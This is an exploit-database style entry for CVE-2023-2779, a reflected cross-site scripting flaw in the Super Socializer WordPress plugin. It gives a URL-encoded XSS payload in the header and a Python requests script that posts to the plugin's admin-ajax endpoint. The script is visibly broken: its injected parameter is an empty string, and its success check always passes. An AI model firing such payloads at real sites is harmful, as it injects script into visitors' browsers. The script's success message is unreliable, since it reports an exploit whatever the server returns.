# Exploit Title: Super Socializer 7.13.52 - Reflected XSS # Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com # Date: 2023-06-20 # Exploit Author: Amirhossein Bahramizadeh # Category : Webapps # Vendor Homepage: https://wordpress.org/plugins/super-socializer # Version: 7.13.52 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-2779 import requests # The URL of the vulnerable AJAX endpoint url = "https://example.com/wp-admin/admin-ajax.php" # The vulnerable parameter that is not properly sanitized and escaped vulnerable_param = "" # The payload that exploits the vulnerability payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"} # Send a POST request to the vulnerable endpoint with the payload response = requests.post(url, data=payload) # Check if the payload was executed by searching for the injected script tag if "" in response.text: print("Vulnerability successfully exploited") else: print("Vulnerability not exploitable")